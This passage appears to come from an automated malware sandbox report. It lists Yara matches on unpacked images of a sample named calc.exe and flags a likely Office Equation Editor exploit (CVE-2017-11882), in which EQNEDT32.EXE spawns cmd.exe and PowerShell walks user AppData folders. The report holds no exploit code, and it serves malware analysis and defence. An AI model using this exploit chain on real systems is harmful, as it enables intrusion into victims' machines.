          Source: Yara matchFile source: 0000001B.00000002.2182595264.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.2131004722.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.2343791547.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.2237652870.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2180231899.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.2130875458.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 23.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 23.2.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 21.2.calc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Found potential equation exploit (CVE-2017-11882)Show sources
          Source: Static RTF information: Object: 2 Offset: 0000CFF9h
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

          Software Vulnerabilities:

          bar